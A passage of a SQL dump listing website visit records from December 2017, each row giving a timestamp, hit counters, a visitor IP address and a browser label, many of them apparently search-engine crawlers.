88544,1513825550,1,1,0,0,'195.154.199.74','firefox'),(188545,1513825847,1,1,0,0,'66.249.70.27','chrome'),(188546,1513825933,1,1,0,0,'66.249.64.29','chrome'),(188547,1513826528,1,1,0,0,'164.132.162.188','other'),(188548,1513827006,1,1,0,0,'51.255.71.111','other'),(188549,1513827048,1,0,1,0,'66.249.75.17',''),(188550,1513827863,1,0,1,0,'66.249.64.30',''),(188551,1513828346,1,1,0,0,'217.69.133.221','other'),(188552,1513829238,1,0,1,0,'66.249.64.30',''),(188553,1513829464,1,1,0,0,'66.249.64.28','chrome'),(188554,1513829570,1,0,1,0,'66.249.70.27',''),(188555,1513829582,1,0,1,0,'66.249.70.29',''),(188556,1513829693,2,0,2,0,'66.249.70.25',''),(188557,1513831189,1,1,0,0,'137.74.207.164','other'),(188558,1513831219,1,1,0,0,'137.74.207.116','other'),(188559,1513831369,1,1,0,0,'137.74.207.188','other'),(188560,1513831728,1,1,0,0,'157.55.39.212','other'),(188561,1513833077,1,1,0,0,'157.55.39.212','other'),(188562,1513833314,1,0,1,0,'66.249.70.29',''),(188563,1513833318,1,1,0,0,'8.29.198.26','other'),(188564,1513833546,1,1,0,0,'137.74.207.120','other'),(188565,1513833676,1,1,0,0,'164.132.162.153','other'),(188566,1513834042,1,1,0,0,'109.194.87.169','chrome'),(188567,1513834373,1,1,0,0,'51.255.71.127','other'),(188568,1513834440,1,1,0,0,'35.225.221.87','other'),(188569,1513834458,1,1,0,0,'66.249.64.28','chrome'),(188570,1513834862,1,1,0,0,'194.246.74.188','chrome'),(188571,1513836067,1,1,0,0,'51.255.71.115','other'),(188572,1513836387,1,0,1,0,'66.249.64.28',''),(188573,1513836658,1,0,1,0,'66.249.64.30',''),(188574,1513837456,1,1,0,0,'51.255.71.114','other'),(188575,1513837574,1,1,0,0,'137.74.207.159','other'),(188576,1513837686,1,1,0,0,'91.124.238.244','chrome'),(188577,1513838117,1,1,0,0,'91.196.178.66','chrome'),(188578,1513838528,1,1,0,0,'51.255.71.127','other'),(188579,1513838671,1,0,1,0,'66.249.70.25',''),(188580,1513838795,1,1,0,0,'157.55.39.203','other'),(188581,1513839140,1,1,0,0,'193.105.7.27','chrome'),(188582,1513839332,1,1,0,0,'164.132.162.156','other'),(188583,1513840576,1,1,0,0,'207.46.13.103','other'),(188584,1513840614,1,1,0,0,'178.54.190.249','chrome'),(188585,1513841051,1,1,0,0,'164.132.162.160','other'),(188586,1513841435,1,1,0,0,'91.196.178.70','chrome'),(188587,1513842192,1,1,0,0,'91.196.178.71','chrome'),(188588,1513842417,1,1,0,0,'95.133.52.236','chrome'),(188589,1513842590,1,1,0,0,'66.249.64.29','chrome'),(188590,1513842828,1,1,0,0,'91.196.178.165','chrome'),(188591,1513843263,2,2,0,0,'82.207.121.233','chrome'),(188592,1513843511,1,1,0,0,'51.255.71.119','other'),(188593,1513843879,1,1,0,0,'82.207.27.3','chrome'),(188594,1513844164,1,1,0,0,'8.29.198.27','other'),(188595,1513844718,1,1,0,0,'176.111.33.18','chrome'),(188596,1513845364,1,1,0,0,'93.183.228.65','chrome'),(188597,1513845467,3,3,0,0,'95.135.212.138','chrome'),(188598,1513845540,1,1,0,0,'91.196.178.98','chrome'),(188599,1513845852,1,1,0,0,'93.78.239.187','chrome'),(188600,1513846213,1,1,0,0,'54.165.59.7','other'),(188601,1513846826,1,1,0,0,'141.8.142.74','other'),(188602,1513847807,1,1,0,0,'51.255.71.123','other'),(188603,1513847894,1,0,1,0,'66.249.64.30',''),(188604,1513848056,1,1,0,0,'165.227.236.217','other'),(188605,1513848064,2,2,0,0,'95.132.6.132','firefox'),(188606,1513848116,1,1,0,0,'137.74.207.116','other'),(188607,1513848165,1,1,0,0,'178.92.154.23','firefox'),(188608,1513848338,4,4,0,0,'66.249.64.29','chrome'),(188609,1513848472,1,1,0,0,'66.249.64.28','chrome'),(188610,1513848481,1,1,0,0,'66.249.64.30','chrome'),(188611,1513848633,1,1,0,0,'51.255.71.112','other'),(188612,1513848638,1,1,0,0,'178.62.230.201','chrome'),(188613,1513848876,1,1,0,0,'141.8.142.74','other'),(188614,1513848929,1,1,0,0,'91.196.178.98','chrome'),(188615,1513848996,1,1,0,0,'51.255.71.127','other'),(188616,1513849200,1,1,0,0,'91.196.177.46','chrome'),(188617,1513849668,1,1,0,0,'164.132.162.159','other'),(188618,1513849799,1,0,1,0,'66.249.70.25',''),(188619,1513849830,1,1,0,0,'46.133.172.137','chrome'),(188620,1513850060,1,1,0,0,'91.196.178.98','chrome'),(188621,1513850933,1,1,0,0,'78.111.185.83','chrome'),(188622,1513851300,1,1,0,0,'194.246.74.188','chrome'),(188623,1513851376,1,1,0,0,'91.196.178.98','chrome'),(188624,1513851450,1,1,0,0,'40.77.167.33','other'),(188625,1513851742,1,1,0,0,'51.255.71.122','other'),(188626,1513851795,1,1,0,0,'51.255.71.123','other'),(188627,1513852021,1,1,0,0,'185.30.202.199','other'),(188628,1513852417,1,1,0,0,'109.194.87.169','firefox'),(188629,1513852888,1,1,0,0,'109.243.253.128','other'),(188630,1513853188,1,1,0,0,'164.132.164.180','other'),(188631,1513853379,1,0,1,0,'66.249.64.30',''),(188632,1513853478,1,0,1,0,'66.249.64.29',''),(188633,1513853521,1,0,1,0,'66.249.64.28',''),(188634,1513853843,1,1,0,0,'178.95.195.235','chrome'),(188635,1513854151,1,1,0,0,'51.255.64.106','other'),(188636,1513854442,1,1,0,0,'141.8.142.74','other'),(188637,1513854538,1,1,0,0,'37.53.66.16','firefox'),(188638,1513854998,1,1,0,0,'8.29.198.27','other'),(188639,1513855044,1,1,0,0,'65.55.210.228','other'),(188640,1513855117,2,2,0,0,'95.135.213.111','chrome'),(188641,1513855134,1,1,0,0,'91.213.149.95','chrome'),(188642,1513855379,1,1,0,0,'164.132.162.157','other'),(188643,1513855679,1,1,0,0,'51.255.71.116','other'),(188644,1513856330,2,2,0,0,'178.154.171.88','other'),(188645,1513856437,1,1,0,0,'217.69.133.247','other'),(188646,1513856465,2,2,0,0,'35.225.221.87','other'),(188647,1513856597,1,1,0,0,'91.196.178.68','chrome'),(188648,1513856689,1,1,0,0,'141.8.142.74','other'),(188649,1513857569,1,1,0,0,'178.92.215.189','chrome'),(188650,1513858129,1,1,0,0,'46.219.234.33','other'),(188651,1513858734,1,1,0,0,'78.111.190.144','chrome'),(188652,1513858914,1,1,0,0,'217.69.133.220','other'),(188653,1513859147,2,2,0,0,'46.211.4.14','chrome'),(188654,1513859360,1,1,0,0,'164.132.162.157','other'),(188655,1513859547,1,1,0,0,'54.165.59.7','other'),(188656,1513859907,1,1,0,0,'37.9.113.182','other'),(188657,1513859910,1,1,0,0,'91.196.178.162','chrome'),(188658,1513860252,1,1,0,0,'35.225.221.87','other'),(188659,1513860480,1,0,1,0,'66.249.70.27',''),(188660,1513861070,1,0,1,0,'66.249.70.25',''),(188661,1513861342,1,1,0,0,'37.73.197.101','other'),(188662,1513861554,1,1,0,0,'37.73.220.225','other'),(188663,1513861864,1,1,0,0,'35.225.221.87','other'),(188664,1513861992,1,1,0,0,'46.201.35.203','chrome'),(188665,1513862232,1,1,0,0,'137.74.207.188','other'),(188666,1513862266,1,1,0,0,'164.132.162.153','other'),(188667,1513862349,1,1,0,0,'91.196.178.67','firefox'),(188668,1513862771,1,1,0,0,'51.255.71.122','other'),(188669,1513862862,1,1,0,0,'217.69.136.205','other'),(188670,1513862864,1,1,0,0,'217.69.136.208','other'),(188671,1513863162,1,1,0,0,'141.8.142.74','other'),(188672,1513863183,1,1,0,0,'137.74.203.194','other'),(188673,1513863504,1,1,0,0,'178.93.228.25','chrome'),(188674,1513863625,1,1,0,0,'51.255.71.112','other'),(188675,1513863995,1,1,0,0,'77.111.245.11','chrome'),(188676,1513864144,1,1,0,0,'178.154.171.88','other'),(188677,1513864579,1,1,0,0,'77.111.245.10','chrome'),(188678,1513864941,1,1,0,0,'91.196.178.70','chrome'),(188679,1513865284,1,1,0,0,'178.154.171.88','other'),(188680,1513865487,2,2,0,0,'141.8.142.74','other'),(188681,1513865672,1,1,0,0,'194.146.191.221','chrome'),(188682,1513865828,1,1,0,0,'8.29.198.25','other'),(188683,1513866033,1,1,0,0,'66.249.70.27','chrome'),(188684,1513866091,1,1,0,0,'51.255.71.126','other'),(188685,1513866546,1,1,0,0,'35.225.221.87','other'),(188686,1513866552,1,1,0,0,'164.132.164.180','other'),(188687,1513866673,1,1,0,0,'51.255.71.133','other'),(188688,1513866700,1,1,0,0,'195.10.210.70','chrome'),(188689,1513866872,1,1,0,0,'51.255.71.112','other'),(188690,1513867372,2,2,0,0,'93.170.97.49','firefox'),(188691,1513867530,1,0,1,0,'66.249.70.29',''),(188692,1513868085,1,1,0,0,'194.183.183.82','chrome'),(188693,1513868439,1,1,0,0,'37.144.45.133','msie'),(188694,1513868440,1,1,0,0,'91.196.178.66','chrome'),(188695,1513868944,1,1,0,0,'51.255.71.125','other'),(188696,1513868962,1,1,0,0,'91.196.178.70','firefox'),(188697,1513868970,1,1,0,0,'51.255.71.101','other'),(188698,1513869244,1,1,0,0,'164.132.162.160','other'),(188699,1513869276,1,0,1,0,'66.249.64.28',''),(188700,1513869344,1,1,0,0,'91.196.178.71','chrome'),(188701,1513869416,1,0,1,0,'66.249.70.29',''),(188702,1513869738,3,3,0,0,'5.9.106.230','other'),(188703,1513869867,1,1,0,0,'91.196.178.66','chrome'),(188704,1513870118,1,1,0,0,'91.196.177.13','chrome'),(188705,1513870961,1,1,0,0,'34.206.54.138','other'),(188706,1513871109,1,1,0,0,'141.8.142.74','other'),(188707,1513872303,1,1,0,0,'137.74.207.170','other'),(188708,1513872988,1,1,0,0,'51.255.71.128','other'),(188709,1513873334,1,1,0,0,'108.59.8.70','other'),(188710,1513873998,1,1,0,0,'217.69.133.67','other'),(188711,1513874433,1,1,0,0,'51.255.71.122','other'),(188712,1513874710,2,2,0,0,'178.154.171.88','other'),(188713,1513874988,1,1,0,0,'137.74.207.188','other'),(188714,1513875045,1,0,1,0,'66.249.70.29',''),(188715,1513875079,1,1,0,0,'193.194.127.222','firefox'),(188716,1513875359,1,1,0,0,'151.80.27.118','other'),(188717,1513875557,1,1,0,0,'37.53.8.48','chrome'),(188718,1513875765,1,1,0,0,'195.10.210.70','chrome'),(188719,1513875834,1,1,0,0,'51.255.71.119','other'),(188720,1513876667,1,1,0,0,'8.29.198.27','other'),(188721,1513877212,1,1,0,0,'164.132.162.155','other'),(188722,1513877253,1,1,0,0,'51.255.71.116','other'),(188723,1513877604,1,1,0,0,'178.154.171.88','other'),(188724,1513877749,1,1,0,0,'217.69.133.235','other'),(188725,1513877825,1,1,0,0,'164.132.162.154','other'),(188726,1513878765,1,1,0,0,'87.250.224.46','other'),(188727,1513878880,1,1,0,0,'178.154.171.88','other'),(188728,1513879004,1,1,0,0,'91.196.178.72','firefox'),(188729,1513879037,3,0,3,0,'66.249.64.28',''),(188730,1513879048,1,0,1,0,'66.249.64.29',''),(188731,1513879141,1,1,0,0,'91.196.178.71','other'),(188732,1513879352,1,1,0,0,'188.163.16.6','chrome'),(188733,1513879655,1,1,0,0,'31.13.113.91','other'),(188734,1513879666,1,1,0,0,'31.13.106.116','other'),(188735,1513879722,1,1,0,0,'212.90.60.220','other'),(188736,1513880018,1,1,0,0,'176.36.213.107','chrome'),(188737,1513880374,1,1,0,0,'87.250.224.46','other'),(188738,1513880464,1,1,0,0,'95.132.114.233','chrome'),(188739,1513880843,1,1,0,0,'51.255.71.116','other'),(188740,1513881549,1,1,0,0,'35.225.221.87','other'),(188741,1513882022,1,0,1,0,'66.249.75.28',''),(188742,1513882433,1,1,0,0,'91.196.178.101','chrome'),(188743,1513883007,1,1,0,0,'195.154.199.74','firefox'),(188744,1513883330,1,0,1,0,'66.249.75.15',''),(188745,1513883367,1,1,0,0,'51.255.71.113','other'),(188746,1513883835,1,1,0,0,'164.132.162.160','other'),(188747,1513884179,1,0,1,0,'66.249.75.17',''),(188748,1513884628,1,1,0,0,'54.165.59.7','other'),(188749,1513884686,1,1,0,0,'178.137.83.166','chrome'),(188750,1513884802,1,1,0,0,'91.196.178.66','other'),(188751,1513885314,1,1,0,0,'195.154.199.74','chrome'),(188752,1513886017,1,0,1,0,'66.249.75.15',''),(188753,1513886310,1,1,0,0,'91.196.178.66','other'),(188754,1513887333,1,1,0,0,'130.180.208.147','chrome'),(188755,1513887351,1,1,0,0,'195.154.199.74','chrome'),(188756,1513887516,1,1,0,0,'8.29.198.25','other'),(188757,1513888183,1,1,0,0,'66.249.75.16','chrome'),(188758,1513888393,1,1,0,0,'66.249.69.39','chrome'),(188759,1513888502,1,1,0,0,'66.249.69.35','chrome'),(188760,1513888546,1,1,0,0,'91.196.178.166','chrome'),(188761,1513888601,1,1,0,0,'37.9.113.182','other'),(188762,1513888899,1,1,0,0,'178.62.238.64','chrome'),(188763,1513889129,1,1,0,0,'164.132.162.155','other'),(188764,1513889615,1,1,0,0,'37.9.113.182','other'),(188765,1513890464,1,1,0,0,'46.118.86.9','chrome'),(188766,1513890581,1,1,0,0,'178.154.171.88','other'),(188767,1513890827,1,1,0,0,'207.46.13.34','other'),(188768,1513891605,1,1,0,0,'54.36.148.53','other'),(188769,1513891606,1,1,0,0,'40.77.167.11','other'),(188770,1513891813,1,1,0,0,'164.132.162.187','other'),(188771,1513891832,1,1,0,0,'54.36.148.27','other'),(188772,1513892729,1,1,0,0,'137.74.207.101','other'),(188773,1513892777,1,1,0,0,'178.154.171.88','other'),(188774,1513892839,1,1,0,0,'51.255.71.120','other'),(188775,1513892951,1,1,0,0,'195.234.69.158','chrome'),(188776,1513893069,1,1,0,0,'193.202.118.163','firefox'),(188777,1513893172,1,1,0,0,'54.36.148.120','other'),(188778,1513893547,1,1,0,0,'51.255.71.118','other'),(188779,1513893685,1,1,0,0,'54.36.148.201','other'),(188780,1513893825,1,1,0,0,'54.36.149.106','other'),(188781,1513893968,1,1,0,0,'54.36.148.243','other'),(188782,1513893974,1,1,0,0,'217.69.133.190','other'),(188783,1513894170,1,1,0,0,'54.36.148.236','other'),(188784,1513894411,1,1,0,0,'54.36.149.15','other'),(188785,1513894444,1,1,0,0,'217.69.133.30','other'),(188786,1513894490,1,1,0,0,'54.36.148.89','other'),(188787,1513895041,1,1,0,0,'141.8.142.74','other'),(188788,1513895133,1,1,0,0,'54.36.148.207','other'),(188789,1513895145,1,1,0,0,'54.36.149.32','other'),(188790,1513895182,1,1,0,0,'54.36.148.196','other'),(188791,1513895383,1,1,0,0,'54.36.148.142','other'),(188792,1513895889,1,1,0,0,'54.36.148.230','other'),(188793,1513896029,1,1,0,0,'66.249.69.35','chrome'),(188794,1513896075,1,1,0,0,'54.36.148.42','other'),(188795,1513897053,1,1,0,0,'54.36.149.107','other'),(188796,1513897055,1,1,0,0,'54.36.148.89','other'),(188797,1513897550,1,1,0,0,'54.36.149.23','other'),(188798,1513897585,1,1,0,0,'54.36.148.112','other'),(188799,1513897957,1,1,0,0,'66.102.9.38','chrome'),(188800,1513898358,1,0,1,0,'66.249.75.29',''),(188801,1513898425,1,1,0,0,'8.29.198.26','other'),(188802,1513898534,1,1,0,0,'217.69.133.222','other'),(188803,1513898535,1,1,0,0,'141.8.142.74','other'),(188804,1513898725,1,1,0,0,'217.69.133.192','other'),(188805,1513898743,1,0,1,0,'66.249.69.35',''),(188806,1513899928,1,1,0,0,'51.255.71.115','other'),(188807,1513899941,1,1,0,0,'66.249.75.28','chrome'),(188808,1513900015,1,1,0,0,'54.36.148.25','other'),(188809,1513901160,1,1,0,0,'54.36.148.200','other'),(188810,1513901193,1,1,0,0,'207.46.13.34','other'),(188811,1513901327,1,1,0,0,'54.36.149.41','other'),(188812,1513901611,1,1,0,0,'54.36.148.11','other'),(188813,1513901725,1,1,0,0,'54.36.149.2','other'),(188814,1513901797,1,1,0,0,'54.36.148.62','other'),(188815,1513901911,1,1,0,0,'195.154.199.74','chrome'),(188816,1513903054,1,1,0,0,'54.36.148.71','other'),(188817,1513903311,1,0,1,0,'66.249.75.28',''),(188818,1513903347,1,1,0,0,'54.36.149.29','other'),(188819,1513903352,1,1,0,0,'54.36.148.237','other'),(188820,1513903358,1,1,0,0,'66.249.69.35','chrome'),(188821,1513903504,1,1,0,0,'54.36.149.32','other'),(188822,1513903506,1,1,0,0,'207.46.13.34','other'),(188823,1513903833,1,1,0,0,'54.36.148.205','other'),(188824,1513903906,1,1,0,0,'54.36.148.143','other'),(188825,1513904841,1,0,1,0,'66.249.69.39',''),(188826,1513904871,1,1,0,0,'54.36.149.47','other'),(188827,1513905679,1,1,0,0,'195.154.199.74','chrome'),(188828,1513906017,1,1,0,0,'54.36.148.136','other'),(188829,1513906317,1,1,0,0,'54.36.148.16','other'),(188830,1513906405,1,1,0,0,'54.36.148.110','other'),(188831,1513906440,1,1,0,0,'54.36.148.29','other'),(188832,1513906781,1,1,0,0,'54.36.148.53','other'),(188833,1513907126,1,1,0,0,'35.225.221.87','other'),(188834,1513907163,1,1,0,0,'217.69.133.223','other'),(188835,1513907242,1,1,0,0,'54.36.149.97','other'),(188836,1513907388,1,1,0,0,'54.36.148.82','other'),(188837,1513907610,1,1,0,0,'54.36.148.206','other'),(188838,1513907843,1,1,0,0,'54.36.148.146','other'),(188839,1513907946,1,0,1,0,'66.249.69.39',''),(188840,1513908354,1,1,0,0,'54.36.148.147','other'),(188841,1513908698,1,1,0,0,'54.36.149.36','other'),(188842,1513908773,1,1,0,0,'54.36.149.56','other'),(188843,1513908871,1,1,0,0,'54.36.149.89','other'),(188844,1513909041,1,1,0,0,'54.36.148.253','other'),(188845,1513909193,1,1,0,0,'54.36.148.234','other'),(188846,1513909288,1,1,0,0,'8.29.198.25','other'),(188847,1513909682,3,3,0,0,'91.121.86.136','other'),(188848,1513909860,1,1,0,0,'40.77.167.11','other'),(188849,1513910217,1,1,0,0,'54.36.148.94','other'),(188850,1513910360,1,1,0,0,'54.36.148.90','other'),(188851,1513910424,1,1,0,0,'54.36.148.27','other'),(188852,1513910446,1,1,0,0,'54.36.149.34','other'),(188853,1513910712,1,1,0,0,'54.36.148.164','other'),(188854,1513911274,1,1,0,0,'54.36.149.54','other'),(188855,1513911641,1,1,0,0,'40.77.167.11','other'),(188856,1513912036,1,1,0,0,'54.36.148.104','other'),(188857,1513912265,1,1,0,0,'54.36.148.137','other'),(188858,1513912511,1,1,0,0,'54.36.148.119','other'),(188859,1513912572,1,1,0,0,'54.36.148.46','other'),(188860,1513912621,1,1,0,0,'51.255.71.116','other'),(188861,1513912740,1,1,0,0,'54.36.148.10','other'),(188862,1513912807,1,1,0,0,'54.36.148.140','other'),(188863,1513913054,1,1,0,0,'51.255.71.132','other'),(188864,1513913198,1,0,1,0,'66.249.69.41',''),(188865,1513913374,1,1,0,0,'54.36.148.250','other'),(188866,1513913595,1,1,0,0,'54.36.149.19','other'),(188867,1513913971,1,1,0,0,'54.36.149.85','other'),(188868,1513914833,1,1,0,0,'54.36.148.84','other'),(188869,1513915005,1,1,0,0,'54.36.148.128','other'),(188870,1513915009,1,1,0,0,'54.36.148.98','other'),(188871,1513915012,1,1,0,0,'54.36.149.81','other'),(188872,1513915077,1,1,0,0,'54.36.148.55','other'),(188873,1513915164,1,1,0,0,'51.255.71.120','other'),(188874,1513915776,1,1,0,0,'54.36.148.41','other'),(188875,1513915809,1,1,0,0,'54.36.149.38','other'),(188876,1513916059,1,1,0,0,'54.36.148.135','other'),(188877,1513916255,1,1,0,0,'54.36.148.13','other'),(188879,1513916323,1,1,0,0,'54.36.149.44','other'),(188880,1513916410,1,1,0,0,'54.36.149.64','other'),(188881,1513916423,1,1,0,0,'54.36.148.119','other'),(188882,1513916758,1,1,0,0,'54.36.148.36','other'),(188883,1513917052,1,1,0,0,'54.36.148.176','other'),(188884,1513917215,1,1,0,0,'54.36.148.128','other'),(188885,1513917286,1,1,0,0,'54.36.148.17','other'),(188886,1513917635,1,1,0,0,'51.255.71.130','other'),(188887,1513917684,2,2,0,0,'54.36.149.85','other'),(188888,1513917820,1,1,0,0,'54.36.148.163','other'),(188889,1513917845,1,1,0,0,'54.36.148.41','other'),(188890,1513917859,1,1,0,0,'107.167.104.219','other'),(188891,1513918418,1,1,0,0,'54.36.149.66','other'),(188892,1513918711,1,1,0,0,'217.69.133.238','other'),(188893,1513918804,1,1,0,0,'95.220.107.210','msie'),(188894,1513918861,1,1,0,0,'54.36.148.105','other'),(188895,1513919128,1,1,0,0,'54.36.148.42','other'),(188896,1513919314,1,1,0,0,'54.36.148.251','other'),(188897,1513919374,1,1,0,0,'54.36.149.78','other'),(188898,1513919375,1,1,0,0,'54.36.148.83','other'),(188899,1513919477,1,1,0,0,'54.36.148.87','other'),(188900,1513919762,1,1,0,0,'54.36.149.27','other'),(188901,1513920021,1,1,0,0,'54.36.148.230','other'),(188902,1513920087,1,1,0,0,'54.36.149.21','other'),(188903,1513920093,1,1,0,0,'54.36.149.55','other'),(188904,1513920121,1,1,0,0,'54.36.148.88','other'),(188905,1513920127,1,1,0,0,'8.29.198.25','other'),(188906,1513920413,1,1,0,0,'54.36.148.149','other'),(188907,1513920496,1,1,0,0,'54.36.148.238','other'),(188908,1513920607,1,1,0,0,'217.69.136.207','other'),(188909,1513920661,1,1,0,0,'157.55.39.203','other'),(188910,1513920985,1,1,0,0,'54.36.148.48','other'),(188911,1513921233,1,1,0,0,'54.36.148.185','other'),(188912,1513921247,1,1,0,0,'54.36.149.88','other'),(188913,1513921792,1,1,0,0,'54.36.149.80','other'),(188914,1513921857,1,1,0,0,'180.76.15.143','other'),(188915,1513922094,1,1,0,0,'54.36.148.25','other'),(188916,1513922102,1,1,0,0,'54.36.148.189','other'),(188917,1513922241,1,1,0,0,'54.36.148.122','other'),(188918,1513922506,1,0,1,0,'68.180.229.52',''),(188919,1513923013,1,0,1,0,'66.249.69.35',''),(188920,1513923451,1,1,0,0,'54.36.149.41','other'),(188921,1513923529,1,1,0,0,'54.36.148.185','other'),(188922,1513923576,1,1,0,0,'54.36.149.104','other'),(188923,1513923683,1,1,0,0,'54.36.148.51','other'),(188924,1513923700,1,1,0,0,'54.36.149.26','other'),(188925,1513924460,1,1,0,0,'54.36.149.3','other'),(188926,1513924518,1,1,0,0,'207.46.13.34','other'),(188927,1513924594,1,1,0,0,'54.36.148.63','other'),(188928,1513924613,1,1,0,0,'54.36.149.27','other'),(188929,1513924632,1,0,1,0,'66.249.69.41',''),(188930,1513925083,1,1,0,0,'217.69.133.231','other'),(188931,1513925277,1,1,0,0,'54.36.148.187','other'),(188932,1513925716,1,1,0,0,'54.36.148.84','other'),(188933,1513925777,1,1,0,0,'91.196.178.70','chrome'),(188934,1513925844,7,7,0,0,'208.110.93.78','other'),(188935,1513925858,1,1,0,0,'54.36.148.231','other'),(188936,1513925908,1,1,0,0,'91.196.178.65','chrome'),(188937,1513925913,1,1,0,0,'54.36.148.13','other'),(188938,1513926082,1,1,0,0,'217.69.133.250','other'),(188939,1513926271,1,0,1,0,'66.249.69.35',''),(188940,1513926356,1,0,1,0,'66.249.75.28',''),(188941,1513926446,1,1,0,0,'54.36.148.106','other'),(188942,1513926610,1,1,0,0,'54.36.148.65','other'),(188943,1513926706,1,1,0,0,'54.36.148.49','other'),(188944,1513926827,1,1,0,0,'54.36.148.199','other'),(188945,1513926870,1,1,0,0,'54.36.148.188','other'),(188946,1513927160,1,1,0,0,'92.113.0.223','chrome'),(188947,1513927180,2,0,2,0,'66.249.69.35',''),(188948,1513927182,1,1,0,0,'54.36.148.187','other'),(188949,1513927228,1,0,1,0,'66.249.69.41',''),(188950,1513927237,1,1,0,0,'54.36.149.41','other'),(188951,1513927257,1,1,0,0,'91.196.178.65','chrome'),(188952,1513927313,1,1,0,0,'141.8.142.74','other'),(188953,1513927349,1,1,0,0,'54.36.148.101','other'),(188954,1513927505,1,1,0,0,'54.36.149.83','other'),(188955,1513928061,1,1,0,0,'54.36.148.166','other'),(188956,1513928062,1,1,0,0,'54.36.148.191','other'),(188957,1513928160,1,1,0,0,'54.36.148.13','other'),(188958,1513928180,1,1,0,0,'91.196.178.70','chrome'),(188959,1513928216,1,1,0,0,'91.196.178.65','firefox'),(188960,1513928406,1,0,1,0,'66.249.69.39',''),(188961,1513928491,1,1,0,0,'37.9.113.115','other'),(188962,1513928597,1,1,0,0,'91.196.178.131','firefox'),(188963,1513928620,1,1,0,0,'54.36.149.92','other'),(188964,1513928654,1,1,0,0,'178.54.190.249','chrome'),(188965,1513928973,1,1,0,0,'54.36.148.172','other'),(188966,1513929164,1,1,0,0,'91.196.178.70','chrome'),(188967,1513929612,1,1,0,0,'87.250.224.46','other'),(188968,1513930067,1,1,0,0,'54.36.148.178','other'),(188969,1513930069,1,1,0,0,'82.145.223.69','chrome'),(188970,1513930070,1,0,1,0,'68.180.229.52',''),(188971,1513930196,1,1,0,0,'54.36.148.246','other'),(188972,1513930264,1,1,0,0,'91.196.178.65','chrome'),(188973,1513930274,1,1,0,0,'91.196.178.70','chrome'),(188974,1513930477,1,1,0,0,'54.36.149.55','other'),(188975,1513930535,2,2,0,0,'178.54.15.133','chrome'),(188976,1513930583,1,0,1,0,'66.249.75.28',''),(188977,1513930953,1,1,0,0,'35.225.221.87','other'),(188978,1513930961,1,1,0,0,'8.29.198.25','other'),(188979,1513931072,1,0,1,0,'66.249.69.39',''),(188980,1513931117,1,1,0,0,'54.36.149.53','other'),(188981,1513931273,1,1,0,0,'54.36.149.74','other'),(188982,1513931358,1,1,0,0,'54.36.149.1','other'),(188983,1513931699,1,1,0,0,'54.36.148.186','other'),(188984,1513932170,1,1,0,0,'91.196.178.70','chrome'),(188985,1513932175,1,1,0,0,'54.36.148.74','other'),(188986,1513932194,1,1,0,0,'54.36.149.18','other'),(188987,1513932309,1,1,0,0,'54.36.148.205','other'),(188988,1513932311,1,1,0,0,'54.36.148.172','other'),(188989,1513932453,1,1,0,0,'176.122.98.246','chrome'),(188990,1513932514,1,1,0,0,'35.225.221.87','other'),(188991,1513932717,1,1,0,0,'54.36.148.81','other'),(188992,1513932914,1,1,0,0,'54.36.149.75','other'),(188993,1513933101,1,1,0,0,'217.69.133.246','other'),(188994,1513933108,1,1,0,0,'54.36.148.10','other'),(188995,1513933262,1,1,0,0,'54.36.148.243','other'),(188996,1513933279,1,1,0,0,'54.36.148.60','other'),(188997,1513933350,1,1,0,0,'78.111.185.236','chrome'),(188998,1513933515,1,1,0,0,'54.36.149.33','other'),(188999,1513933826,1,1,0,0,'77.222.159.114','chrome'),(189000,1513933953,1,1,0,0,'54.36.148.20','other'),(189001,1513934059,1,1,0,0,'91.196.178.135','chrome'),(189002,1513934164,1,1,0,0,'54.36.149.36','other'),(189003,1513934496,1,1,0,0,'35.225.221.87','other'),(189004,1513934641,1,1,0,0,'54.36.149.31','other'),(189005,1513934789,1,1,0,0,'54.36.148.95','other'),(189006,1513934849,1,1,0,0,'54.36.148.25','other'),(189007,1513934963,1,1,0,0,'66.249.75.29','chrome'),(189008,1513935328,1,0,1,0,'66.249.69.35',''),(189009,1513935370,1,1,0,0,'54.36.148.70','other'),(189010,1513935452,1,1,0,0,'54.36.149.48','other'),(189011,1513935720,1,1,0,0,'54.36.148.45','other'),(189012,1513935935,1,1,0,0,'54.36.149.47','other'),(189013,1513936116,1,1,0,0,'54.36.148.89','other'),(189014,1513936179,1,1,0,0,'54.208.102.37','other'),(189015,1513936429,1,1,0,0,'54.36.149.54','other'),(189016,1513936628,1,1,0,0,'91.196.177.15','chrome'),(189017,1513936698,1,0,1,0,'66.249.69.39',''),(189018,1513936909,1,1,0,0,'54.36.149.70','other'),(189019,1513936927,1,1,0,0,'51.255.71.131','other'),(189020,1513936932,1,1,0,0,'54.36.148.144','other'),(189021,1513936955,1,1,0,0,'54.36.148.129','other'),(189022,1513937030,1,1,0,0,'78.111.186.184','firefox'),(189023,1513937047,1,1,0,0,'54.36.148.171','other'),(189024,1513937235,1,1,0,0,'54.36.149.91','other'),(189025,1513937296,1,1,0,0,'54.36.149.96','other'),(189026,1513937631,1,1,0,0,'54.36.148.244','other'),(189027,1513937662,1,1,0,0,'54.36.148.186','other'),(189028,1513937771,1,1,0,0,'54.36.148.175','other'),(189029,1513937799,1,1,0,0,'54.36.149.0','other'),(189030,1513938008,1,1,0,0,'54.36.149.27','other'),(189031,1513938215,1,0,1,0,'66.249.69.41',''),(189032,1513938398,1,1,0,0,'91.196.177.46','firefox'),(189033,1513938576,1,1,0,0,'54.36.148.74','other'),(189034,1513938775,1,1,0,0,'54.36.148.123','other'),(189035,1513938839,1,1,0,0,'54.36.149.48','other'),(189036,1513938918,1,1,0,0,'109.194.87.169','firefox'),(189037,1513939021,1,1,0,0,'54.36.149.20','other'),(189038,1513939181,1,1,0,0,'54.36.148.50','other'),(189039,1513939405,1,1,0,0,'54.36.149.105','other'),(189040,1513939618,1,1,0,0,'54.36.148.40','other'),(189041,1513939729,1,1,0,0,'54.36.148.166','other'),(189042,1513940017,1,1,0,0,'178.154.171.88','other'),(189043,1513940052,1,1,0,0,'51.255.71.131','other'),(189044,1513940053,1,1,0,0,'54.36.148.140','other'),(189045,1513940068,1,1,0,0,'54.36.148.200','other'),(189046,1513940089,1,1,0,0,'77.37.169.25','other'),(189047,1513940225,1,1,0,0,'54.36.148.237','other'),(189048,1513940278,1,1,0,0,'54.36.149.5','other'),(189049,1513940342,1,1,0,0,'46.201.0.48','firefox'),(189050,1513940690,1,1,0,0,'54.36.148.67','other'),(189051,1513940866,1,1,0,0,'51.255.71.119','other'),(189052,1513940892,1,1,0,0,'54.36.149.6','other'),(189053,1513941040,1,1,0,0,'54.36.148.202','other'),(189054,1513941468,1,1,0,0,'54.36.148.128','other'),(189055,1513941480,1,1,0,0,'188.255.23.139','chrome')